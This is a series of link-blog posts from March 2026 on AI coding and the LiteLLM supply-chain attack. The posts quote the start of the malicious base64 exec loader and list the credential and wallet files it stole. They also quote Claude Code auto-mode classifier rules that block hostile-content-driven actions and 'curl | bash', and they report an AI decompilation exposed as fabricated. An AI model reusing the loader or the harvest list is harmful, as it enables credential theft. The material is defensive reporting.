| We Rewrote JSONata with AI in a Day, Saved $500K/Year |
https://www.reco.ai/blog/we-rewrote-jsonata-with-ai |
Bit of a hyperbolic framing but this looks like another case study of **vibe porting**, this time spinning up a new custom Go implementation of the [JSONata](https://jsonata.org) JSON expression language - similar in focus to jq, and heavily associated with the [Node-RED](https://nodered.org) platform.
As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend.
The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one. |
2026-03-27 00:35:01+00:00 |
| My minute-by-minute response to the LiteLLM malware attack |
https://futuresearch.ai/blog/litellm-attack-transcript/ |
Callum McMahon reported the [LiteLLM malware attack](https://simonwillison.net/2026/Mar/24/malicious-litellm/) to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:
> **Confirmed**. Fresh download from PyPI right now in an isolated Docker container:
>
> Inspecting: litellm-1.82.8-py3-none-any.whl
> FOUND: litellm_init.pth
> SIZE: 34628 bytes
> FIRST 200 CHARS:
> import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
>
> The malicious `litellm==1.82.8` is **live on PyPI right now** and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.
I was chuffed to see Callum use my [claude-code-transcripts](https://github.com/simonw/claude-code-transcripts) tool to publish the transcript of the conversation. |
2026-03-26 23:58:22+00:00 |
| Quantization from the ground up |
https://ngrok.com/blog/quantization |
Sam Rose continues [his streak](https://simonwillison.net/tags/sam-rose/) of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "[the best post I've ever made](https://twitter.com/samwhoo/status/2036845101561835968)".)
Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits.

I hadn't heard about **outlier values** in quantization - rare float values that exist outside of the normal tiny-value distribution - but apparently they're very important:
> Why do these outliers exist? [...] tl;dr: no one conclusively knows, but a small fraction of these outliers are *very* important to model quality. Removing even a *single* "super weight," as Apple calls them, can cause the model to output complete gibberish.
>
> Given their importance, real-world quantization schemes sometimes do extra work to preserve these outliers. They might do this by not quantizing them at all, or by saving their location and value into a separate table, then removing them so that their block isn't destroyed.
Plus there's a section on [How much does quantization affect model accuracy?](https://ngrok.com/blog/quantization#how-much-does-quantization-affect-model-accuracy). Sam explains the concepts of **perplexity** and ** KL divergence ** and then uses the [llama.cpp perplexity tool](https://github.com/ggml-org/llama.cpp/tree/master/tools/perplexity) and a run of the GPQA benchmark to show how different quantization levels affect Qwen 3.5 9B.
His conclusion:
> It looks like 16-bit to 8-bit carries almost no quality penalty. 16-bit to 4-bit is more noticeable, but it's certainly not a quarter as good as the original. Closer to 90%, depending on how you want to measure it. |
2026-03-26 16:21:09+00:00 |
| Thoughts on slowing the fuck down |
https://news.ycombinator.com/item?id=47517539 |
Mario Zechner created the [Pi agent framework](https://github.com/badlogic/pi-mono) used by OpenClaw, giving considerable credibility to his opinions on current trends in agentic engineering. He's not impressed:
> We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned.
Agents and humans both make mistakes, but agent mistakes accumulate much faster:
> A human is a bottleneck. A human cannot shit out 20,000 lines of code in a few hours. Even if the human creates such booboos at high frequency, there's only so many booboos the human can introduce in a codebase per day. [...]
>
> With an orchestrated army of agents, there is no bottleneck, no human pain. These tiny little harmless booboos suddenly compound at a rate that's unsustainable. You have removed yourself from the loop, so you don't even know that all the innocent booboos have formed a monster of a codebase. You only feel the pain when it's too late. [...]
>
> You have zero fucking idea what's going on because you delegated all your agency to your agents. You let them run free, and they are merchants of complexity.
I think Mario is exactly right about this. Agents let us move *so much faster*, but this speed also means that changes which we would normally have considered over the course of weeks are landing in a matter of hours.
It's so easy to let the codebase evolve outside of our abilities to reason clearly about it. [Cognitive debt](https://simonwillison.net/tags/cognitive-debt/) is real.
Mario recommends slowing down:
> Give yourself time to think about what you're actually building and why. Give yourself an opportunity to say, fuck no, we don't need this. Set yourself limits on how much code you let the clanker generate per day, in line with your ability to actually review the code.
>
> Anything that defines the gestalt of your system, that is architecture, API, and so on, write it by hand. [...]
I'm not convinced writing by hand is the best way to address this, but it's absolutely the case that we need the discipline to find a new balance of speed v.s. mental thoroughness now that typing out the code is no longer anywhere close to being the bottleneck on writing software. |
2026-03-25 21:47:17+00:00 |
| LiteLLM Hack: Were You One of the 47,000? |
https://futuresearch.ai/blog/litellm-hack-were-you-one-of-the-47000/ |
Daniel Hnyk used the [BigQuery PyPI dataset](https://console.cloud.google.com/bigquery?p=bigquery-public-data&d=pypi) to determine how many downloads there were of [the exploited LiteLLM packages](https://simonwillison.net/2026/Mar/24/malicious-litellm/) during the 46 minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8).
They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited version. |
2026-03-25 17:21:04+00:00 |
| Auto mode for Claude Code |
https://claude.com/blog/auto-mode |
Really interesting new development in Claude Code today as an alternative to `--dangerously-skip-permissions`:
> Today, we're introducing auto mode, a new permissions mode in Claude Code where Claude makes permission decisions on your behalf, with safeguards monitoring actions before they run.
Those safeguards appear to be implemented using Claude Sonnet 4.6, as [described in the documentation](https://code.claude.com/docs/en/permission-modes#eliminate-prompts-with-auto-mode):
> Before each action runs, a separate classifier model reviews the conversation and decides whether the action matches what you asked for: it blocks actions that escalate beyond the task scope, target infrastructure the classifier doesn’t recognize as trusted, or appear to be driven by hostile content encountered in a file or web page. [...]
>
> **Model**: the classifier runs on Claude Sonnet 4.6, even if your main session uses a different model.
They ship with an extensive set of default filters, and you can also customize them further with your own rules. The most interesting insight into how they work comes when you run this new command in the terminal:
claude auto-mode defaults
[Here's the full JSON output](https://gist.githubusercontent.com/simonw/91863bfd9f7ebf916d1fabb8e6940335/raw/cda3c88e919b8238e85d3f1cc990e8ff48ad9a18/defaults.json). It's pretty long, so here's an illustrative subset:
From the "allow" list:
> - Test Artifacts: Hardcoded test API keys, placeholder credentials in examples, or hardcoding test cases
> - Local Operations: Agent deleting local files in working directory, local file operations within project scope, or using `--ignore-certificate-errors` for local testing. "Project scope" means the repository the session started in — wandering into ~/, ~/Library/, /etc, or other repos is scope escalation (User Intent Rule #2), not a local operation. Does NOT cover irreversible destruction of pre-existing files or local stateful services — see "Irreversible Local Destruction" in BLOCK.
> - Read-Only Operations: GET requests, read-only API calls, or queries that don't modify state and don't contain sensitive information in the URL. Note: PREEMPTIVE BLOCK ON CLEAR INTENT still applies — if the transcript contains clear evidence the agent is using read-only operations to scout for a blocked action, block it.
> - Declared Dependencies: Installing packages that are already declared in the repo's manifest files (requirements.txt, package.json, Cargo.toml, pyproject.toml, Gemfile, etc.) via standard commands that read those manifests (`pip install -r requirements.txt`, `npm install`, `cargo build`, `bundle install`) — provided the agent has not modified the manifest in this session. Does NOT cover installing agent-chosen package names (e.g. `pip install foo`, `npm install bar`) — those carry typosquat and supply-chain risk. [...]
From "soft_deny":
> - Git Destructive: Force pushing (`git push --force`), deleting remote branches, or rewriting remote history
> - Git Push to Default Branch: Pushing directly to main, master, or the repository's default branch — this bypasses pull request review. Commits should be pushed to a new feature branch instead.
> -Code from External: Downloading and executing code from external sources — e.g. `curl | bash`, deserializing external data via formats that can execute code (eval, exec, yaml.unsafe_load, pickle, etc), or similar mechanisms. Also includes running code from an external repo cloned earlier in the transcript (pip install -e, make install, python script.py, pickle.load/torch.load on cloned repo files) — "local on disk" does not mean trusted if it was cloned from an external source visible in the transcript. The repo the agent starts in is trusted.
> - Cloud Storage Mass Delete: Deleting or mass modifying files on cloud storage (S3, GCS, Azure Blob, etc.) [...]
I remain unconvinced by prompt injection protections that rely on AI, since they're non-deterministic by nature. The documentation does warn that this may still let things through:
> The classifier may still allow some risky actions: for example, if user intent is ambiguous, or if Claude doesn't have enough context about your environment to know an action might create additional risk.
The fact that the default allow list includes `pip install -r requirements.txt` also means that this wouldn't protect against supply chain attacks with unpinned dependencies, as seen this morning [with LiteLLM](https://simonwillison.net/2026/Mar/24/malicious-litellm/).
I still want my coding agents to run in a robust sandbox by default, one that restricts file access and network connections in a deterministic way. I trust those a whole lot more than prompt-based protections like this new auto mode. |
2026-03-24 23:57:33+00:00 |
| Package Managers Need to Cool Down |
https://nesbitt.io/2026/03/04/package-managers-need-to-cool-down.html |
Today's [LiteLLM supply chain attack](https://simonwillison.net/2026/Mar/24/malicious-litellm/) inspired me to revisit the idea of [dependency cooldowns](https://simonwillison.net/2025/Nov/21/dependency-cooldowns/), the practice of only installing updated dependencies once they've been out in the wild for a few days to give the community a chance to spot if they've been subverted in some way.
This recent piece (March 4th) piece by Andrew Nesbitt reviews the current state of dependency cooldown mechanisms across different packaging tools. It's surprisingly well supported! There's been a flurry of activity across major packaging tools, including:
- [pnpm 10.16](https://pnpm.io/blog/releases/10.16#new-setting-for-delayed-dependency-updates) (September 2025) — `minimumReleaseAge` with `minimumReleaseAgeExclude` for trusted packages
- [Yarn 4.10.0](https://github.com/yarnpkg/berry/releases/tag/%40yarnpkg%2Fcli%2F4.10.0) (September 2025) — `npmMinimalAgeGate` (in minutes) with `npmPreapprovedPackages` for exemptions
- [Bun 1.3](https://bun.com/blog/bun-v1.3#minimum-release-age) (October 2025) — `minimumReleaseAge` via `bunfig.toml`
- [Deno 2.6](https://deno.com/blog/v2.6#controlling-dependency-stability) (December 2025) — `--minimum-dependency-age` for `deno update` and `deno outdated`
- [uv 0.9.17](https://github.com/astral-sh/uv/releases/tag/0.9.17) (December 2025) — added relative duration support to existing `--exclude-newer`, plus per-package overrides via `exclude-newer-package`
- [pip 26.0](https://ichard26.github.io/blog/2026/01/whats-new-in-pip-26.0/) (January 2026) — `--uploaded-prior-to` (absolute timestamps only; [relative duration support requested](https://github.com/pypa/pip/issues/13674))
- [npm 11.10.0](https://socket.dev/blog/npm-introduces-minimumreleaseage-and-bulk-oidc-configuration) (February 2026) — `min-release-age`
`pip` currently only supports absolute rather than relative dates but Seth Larson [has a workaround for that](https://sethmlarson.dev/pip-relative-dependency-cooling-with-crontab) using a scheduled cron to update the absolute date in the `pip.conf` config file. |
2026-03-24 21:11:38+00:00 |
| Malicious litellm_init.pth in litellm 1.82.8 — credential stealer |
https://github.com/BerriAI/litellm/issues/24512 |
The LiteLLM v1.82.8 package published to PyPI was compromised with a particularly nasty credential stealer hidden in base64 in a `litellm_init.pth` file, which means installing the package is enough to trigger it even without running `import litellm`.
(1.82.7 had the exploit as well but it was in the `proxy/proxy_server.py` file so the package had to be imported for it to take effect.)
This issue has a very detailed description of what the credential stealer does. There's more information about the timeline of the exploit [over here](https://github.com/BerriAI/litellm/issues/24518).
PyPI has already [quarantined](https://pypi.org/help/#project_in_quarantine) the [litellm package](https://pypi.org/project/litellm/) so the window for compromise was just a few hours, but if you DID install the package it would have hoovered up a bewildering array of secrets, including `~/.ssh/`, `~/.gitconfig`, `~/.git-credentials`, `~/.aws/`, `~/.kube/`, `~/.config/`, `~/.azure/`, `~/.docker/`, `~/.npmrc`, `~/.vault-token`, `~/.netrc`, `~/.lftprc`, `~/.msmtprc`, `~/.my.cnf`, `~/.pgpass`, `~/.mongorc.js`, `~/.bash_history`, `~/.zsh_history`, `~/.sh_history`, `~/.mysql_history`, `~/.psql_history`, `~/.rediscli_history`, `~/.bitcoin/`, `~/.litecoin/`, `~/.dogecoin/`, `~/.zcash/`, `~/.dashcore/`, `~/.ripple/`, `~/.bitmonero/`, `~/.ethereum/`, `~/.cardano/`.
It looks like this supply chain attack started with the [recent exploit](https://www.crowdstrike.com/en-us/blog/from-scanner-to-stealer-inside-the-trivy-action-supply-chain-compromise/) against [Trivy](https://trivy.dev/), ironically a security scanner tool that was used in CI [by LiteLLM](https://github.com/BerriAI/litellm/blob/9343aeefca37aa49a6ea54397d7615adae5c72c9/ci_cd/security_scans.sh#L16). The Trivy exploit likely resulted in stolen PyPI credentials which were then used to directly publish the vulnerable packages. |
2026-03-24 15:07:31+00:00 |
| Turbo Pascal 3.02A, deconstructed |
https://tools.simonwillison.net/turbo-pascal-deconstructed |
In [Things That Turbo Pascal is Smaller Than](https://prog21.dadgum.com/116.html) James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler.
This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me.
It did a great job, so I had it create [this interactive artifact](https://tools.simonwillison.net/turbo-pascal-deconstructed) illustrating the result. Here's the [sequence of prompts](https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e) I used (in regular [claude.ai](https://claude.ai/) chat, not Claude Code):
> Read this https://prog21.dadgum.com/116.html
> Now find a copy of that binary online
> Explore this (*I attached the zip file*)
> Build an artifact - no react - that embeds the full turbo.com binary and displays it in a way that helps understand it - broke into labeled segments for different parts of the application, decompiled to visible source code (I guess assembly?) and with that assembly then reconstructed into readable code with extensive annotations

**Update**: Annoyingly the [Claude share link](https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e) doesn't show the actual code that Claude executed, but here's [the zip file](https://static.simonwillison.net/static/2026/turbo-pascal-analysis.zip) it gave me when I asked to download all of the intermediate files.
I ran Codex CLI with GPT-5.4 xhigh against that zip file to see if it would spot any obvious hallucinations, and it did not. This project is low-enough stakes that this gave me enough confidence to publish the result!
<h4 id="hallucinated-slop">Turns out it's hallucinated slop</h4>
**Update 2**, 24th March 2026: rep_lodsb on Hacker News is someone who actually understands assembler, and they reviewed the annotations and [found them to be hallucinated slop](https://news.ycombinator.com/item?id=47471647#47501692):
> [...] Obviously, there has to be a lot more to even a simple-minded x86 code generator than just a generic "emit opcode byte" and "emit call" routine. In general, what A"I" produced here is not a full disassembly but a collection of short snippets, potentially not even including the really interesting ones. But is it even correct?
>
> EmitByte here is unnecessarily pushing/popping AX, which isn't modified by the few instructions in between at all. No competent assembly language programmer would do this. So maybe against all expectations, Turbo Pascal is just really badly coded? No, it's of course a hallucination: those instructions don't appear in the binary at all! [...]
>
> But searching for e.g. the hex opcode B0 E8 ('mov al,0xe8') is enough to confirm that this code snippet isn't to be found *anywhere*.
>
> There is a lot more suspicious code, including some that couldn't possibly work (like the "ret 1" in the system call dispatcher, which would misalign the stack).
>
> Conclusion: it's slop
Because it's amusing to loop this kind of criticism through a model, I [pasted their feedback into Claude](https://claude.ai/share/a64c94eb-c623-4fd4-b101-e3e7d66c77ca) along with instructions to re-review their the code and it agreed with their assessment:
> The commenter's core charge — that the annotated disassembly is "slop" — is substantiated. The artifact presents a mix of genuine analysis (real hex dumps, some correctly disassembled sections) and wholesale fabrication (invented assembly with plausible-sounding labels and comments for roughly half the binary). The fabricated sections look convincing to a casual reader but don't survive byte-level comparison with the actual binary. |
2026-03-20 23:59:14+00:00 |
| Autoresearching Apple's "LLM in a Flash" to run Qwen 397B locally |
https://twitter.com/danveloper/status/2034353876753592372 |
Here's a fascinating piece of research by Dan Woods, who managed to get a custom version of [Qwen3.5-397B-A17B](https://huggingface.co/Qwen/Qwen3.5-397B-A17B/tree/main) running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max despite that model taking up 209GB (120GB quantized) on disk.
Qwen3.5-397B-A17B is a Mixture-of-Experts (MoE) model, which means that each token only needs to run against a subset of the overall model weights. These expert weights can be streamed into memory from SSD, saving them from all needing to be held in RAM at the same time.
Dan used techniques described in Apple's 2023 paper [LLM in a flash: Efficient Large Language Model Inference with Limited Memory](https://arxiv.org/abs/2312.11514):
> This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks.
He fed the paper to Claude Code and used a variant of Andrej Karpathy's [autoresearch pattern](https://simonwillison.net/2026/Mar/13/liquid/) to have Claude run 90 experiments and produce MLX Objective-C and Metal code that ran the model as efficiently as possible.
[danveloper/flash-moe](https://github.com/danveloper/flash-moe) has the resulting code plus [a PDF paper](https://github.com/danveloper/flash-moe/blob/main/paper/flash_moe.pdf) mostly written by Claude Opus 4.6 describing the experiment in full.
The final model has the experts quantized to 2-bit, but the non-expert parts of the model such as the embedding table and routing matrices are kept at their original precision, adding up to 5.5GB which stays resident in memory while the model is running.
Qwen 3.5 usually runs 10 experts per token, but this setup dropped that to 4 while claiming that the biggest quality drop-off occurred at 3.
It's not clear to me how much the quality of the model results are affected. Claude claimed that "Output quality at 2-bit is indistinguishable from 4-bit for these evaluations", but the description of the evaluations it ran is quite thin.
**Update**: Dan's [latest version](https://twitter.com/danveloper/status/2034686509748462022) upgrades to 4-bit quantization of the experts (209GB on disk, 4.36 tokens/second) after finding that the 2-bit version broke tool calling while 4-bit handles that well. |
2026-03-18 23:56:46+00:00 |